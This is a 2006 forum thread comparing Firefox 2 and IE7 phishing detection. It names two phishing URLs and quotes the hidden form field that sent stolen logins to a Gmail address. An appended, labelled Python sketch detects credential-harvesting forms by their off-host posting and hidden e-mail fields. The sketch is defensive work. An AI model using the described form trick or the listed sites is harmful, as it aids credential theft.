superhuman, Posted October 27, 2006 (edited)
I came across and got to know a phishing website: http://www.geocities.com/playboy_model_wit_big_boobs/ Firefox 2 completely fails to detect it is a phishing site, while IE7 reports it as "Suspicious Web site". I think Firefox 2 anti-phishing is just simply a joke. They have no idea what they have built :no:
Test yourself! WARNING: DO NOT ENTER YOUR USERNAME AND PASSWORD
UPDATE: NO NEED TO TEST ANYMORE, because some Firefox supporters have reported this website to Firefox. That way FF2 now displays a message of Suspicious Website. The point is that a true anti-phishing tool needs to have the ability to check the website and identify potential risk, not just checking against a centralized database like Firefox 2. The FF2 development team needs to learn from IE and improve their anti-phishing function. That is the bottom line.
Edited October 27, 2006 by superhuman

primexx, Posted October 27, 2006
You JUST figured that out? LOL. Just about everyone knows that Firefox's phishing filter does nothing.

HoochieMamma, Posted October 27, 2006
Have you selected it to use Google's antiphishing tech?

RangerLG, Posted October 27, 2006
It doesn't warn with either technology selected. I wonder if it doesn't work because the login page is actually a correct page. The submit button is the one that redirects the username/password.

primexx, Posted October 27, 2006
> It doesn't warn with either technology selected. I wonder if it doesn't work because the login page is actually a correct page. The submit button is the one that redirects the username/password.
No, the Firefox phishing filter is flawed, it's true.

Ponto.com, Posted October 27, 2006
It doesn't work for me either. Even with the Google check option. I've only seen it working on that Google test page.

JustGeorge, Posted October 27, 2006
Surely this is just an oversight? Anti-phishing was a much advertised feature in FF2 so I doubt it is completely useless.

superhuman (Author), Posted October 27, 2006
If you check the source, this guy uses a hidden textbox to store your username & password, then sends email to him. Ok, here is the story. They advertised FF2 anti-phishing a lot. So I decided to try it out. It is completely useless.

flyakite, Posted October 27, 2006 (edited)
> If you check the source, this guy uses a hidden textbox to store your username & password, then sends email to him. Ok, here is the story. They advertised FF2 anti-phishing a lot. So I decided to try it out. It is completely useless.
It never hurts to educate yourself. #2 at http://en-us.www.mozilla.com/en-US/firefox...ing-protection/ It says it works by checking the url against a list of KNOWN phishing sites. "Known" is obviously the key word here. Also most phishing sites try to disguise their url by using subdomains etc. with enough garbage that it makes you think you're at a legit URL. One look at that URL and even the most computer illiterate person should be able to tell that's not legit. Fact of the matter is, if it's not in Mozilla's list of known phishing sites, it's obviously not gonna get caught. If you want to submit a site, go to Help > Report Web Forgery.
Edited October 27, 2006 by flyakite

superhuman (Author), Posted October 27, 2006
> It never hurts to educate yourself. #2 at http://en-us.www.mozilla.com/en-US/firefox...ing-protection/ It says it works by checking the url against a list of KNOWN phishing sites. "Known" is obviously the key word here. Also most phishing sites try to disguise their url by using subdomains etc. with enough garbage that it makes you think you're at a legit URL. One look at that URL and even the most computer illiterate person should be able to tell that's not legit. Fact of the matter is, if it's not in Mozilla's list of known phishing sites, it's obviously not gonna get caught. If you want to submit a site, go to Help > Report Web Forgery.
No, you're WRONG. The point is that even IE7 did not have that url reported. It still can detect "Suspicious Website." And that is anti-phishing. Not just checking the url against a centralized database like Firefox does. The way FF2 implements this technology is completely useless in case of a new threat.

Swift_Monkey, Posted October 27, 2006
Firefox 2 did not work here either. :no: Just having a look at the code for that site. It appears all the logins get sent to his gmail address. :angry:

Leddy, Posted October 27, 2006
Looks like Mozilla has some homework to do. "Learn from Microsoft."

Tokar, Posted October 27, 2006
Besides the fact that we are all aware of the fact that it is a phishing site, the new Yahoo login page (for mail, or geocities, or any page which has a Yahoo login feature) has protection built in. You upload an image to Yahoo, and they create a cookie which shows that image next to the login form. If the image is there, you know you can trust the login form to be an official Yahoo one. If no picture is there, then you know it's a fake... mind, I note the picture is a per-computer setting.

Ritalin, Posted October 27, 2006
lol @ the email address the stuff is sent to. megarofl.

Tarzan, Posted October 27, 2006
Test more here http://www.dslreports.com/phishtrack?pid=5122&urls=1 Seems to work just fine. Only a matter of detection rate like with AV - can change. If the offline database or online Google one does not screw up Firefox be happy. None of them picked up 5123, in a few minutes they probably will. Need lots more stats over a longer period to claim either one is perfect or useless.

oscarntommy, Posted October 27, 2006 (edited)
FF2's Anti-Phishing is not totally a joke... FF2 can detect that http://220.133.110.36/~perrypeng/.ws/eBayI...migrateVisitor/ is a phishing site while IE7 did nothing, not even a single warning. IT'S A PHISHING WEBSITE
Edited October 27, 2006 by oscarntommy

ozgeek, Posted October 27, 2006
What? :unsure:

DomZ, Posted October 27, 2006
I guess it is now "known" :p

Jesse Carlton, Posted October 27, 2006
...hence the system works, find a problem, report it, and it's there.

Nighthawk-F117, Posted October 27, 2006
> FF2's Anti-Phishing is not totally a joke... FF2 can detect that http://220.133.110.36/~perrypeng/.ws/eBayI...migrateVisitor/ is a phishing site while IE7 did nothing, not even a single warning. IT'S A PHISHING WEBSITE
That's where you're wrong.

noroom, Posted October 27, 2006
Works for me. Guess they updated their filters?

whitebread, Posted October 27, 2006
I have no idea what y'all are talking about. I went to the site and got a big honkin' warning it was fake. :rolleyes:

zeroday, Posted October 27, 2006
The filter works for me. BTW, the email address it goes to: NAME="Mail_To" VALUE="owning.lamers@gmail.com"> Someone should report this to gmail as well.

User6060, Posted October 27, 2006
Both work fine for me.

BigDaddy5, Posted October 27, 2006
> The filter works for me. BTW, the email address it goes to: NAME="Mail_To" VALUE="owning.lamers@gmail.com"> Someone should report this to gmail as well.
I went ahead and did that. Feel free to, as well, here: https://services.google.com/inquiry/gmail_security4 I just put in N/A for all the e-mail parts, and then explained the url in the 'additional comments' section.

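Added example, not part of the thread and not the actual filter code of Firefox 2 or IE7: the posts above contrast looking a URL up in a list of known phishing sites with inspecting the page itself, and note that the form carries the collecting address in a hidden "Mail_To" field. The sketch below runs both kinds of check over a constructed page; the hosts, the sample HTML and every function name are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[a-z]{2,}$", re.I)

# Constructed sample page (not the real site): hidden e-mail field + off-host action.
SAMPLE_URL = "http://hosting.example/some_user/"
SAMPLE_HTML = """
<form method="post" action="http://mailer.example/send">
  <input type="hidden" name="Mail_To" value="collector@example.invalid">
  <input type="text" name="login">
  <input type="password" name="passwd">
</form>
"""

class FormAudit(HTMLParser):
    """Record, per <form>, the signals a content heuristic can score."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""),
                               "password": False, "hidden_email": []})
        elif tag == "input" and self.forms:
            form, kind = self.forms[-1], a.get("type", "text").lower()
            if kind == "password":
                form["password"] = True
            elif kind == "hidden" and EMAIL_RE.match(a.get("value", "")):
                form["hidden_email"].append(a.get("name", ""))

def blocklist_hit(page_url, known_bad):
    """List-based check: only fires once the URL has been reported."""
    return page_url in known_bad

def heuristic_findings(page_url, html):
    """Content-based check: works on a page nobody has reported yet."""
    audit = FormAudit()
    audit.feed(html)
    host, findings = urlparse(page_url).hostname, []
    for form in audit.forms:
        if not form["password"]:
            continue  # only credential-collecting forms are of interest
        target = urlparse(form["action"]).hostname
        if target and target != host:
            findings.append("password form posts to another host: " + target)
        for name in form["hidden_email"]:
            findings.append("password form carries hidden e-mail field: " + name)
    return findings

if __name__ == "__main__":
    print("blocklist hit:", blocklist_hit(SAMPLE_URL, set()))
    for line in heuristic_findings(SAMPLE_URL, SAMPLE_HTML):
        print("heuristic:", line)
```

An empty list makes the lookup miss the page until someone reports it, while the content check flags it immediately; the price of the heuristic is false positives on legitimate forms that post to a separate login host.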